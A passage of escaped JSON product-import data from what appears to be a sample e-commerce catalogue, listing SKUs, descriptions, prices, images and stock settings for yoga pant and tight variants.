minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"779\":{\"sku\":\"MP08-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-36-Green\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"780\":{\"sku\":\"MP08-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-36-Red\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"781\":{\"sku\":\"MP08\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Sweatpants|Base Layer|Track Pants|Leggings,material=Fleece|LumaTech&trade;|Spandex|Wool,pattern=Solid,climate=All-weather|Cool|Spring|Windy|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP08-32-Blue,size=32,color=Blue|sku=MP08-32-Green,size=32,color=Green|sku=MP08-32-Red,size=32,color=Red|sku=MP08-33-Blue,size=33,color=Blue|sku=MP08-33-Green,size=33,color=Green|sku=MP08-33-Red,size=33,color=Red|sku=MP08-34-Blue,size=34,color=Blue|sku=MP08-34-Green,size=34,color=Green|sku=MP08-34-Red,size=34,color=Red|sku=MP08-36-Blue,size=36,color=Blue|sku=MP08-36-Green,size=36,color=Green|sku=MP08-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Sweatpants|Base Layer|Track Pants|Leggings\",\"material\":\"Fleece|LumaTech&trade;|Spandex|Wool\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"782\":{\"sku\":\"MP09-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-32-Black\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"783\":{\"sku\":\"MP09-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-32-Blue\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"784\":{\"sku\":\"MP09-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-32-Red\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"785\":{\"sku\":\"MP09-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-33-Black\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"786\":{\"sku\":\"MP09-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-33-Blue\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"787\":{\"sku\":\"MP09-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston 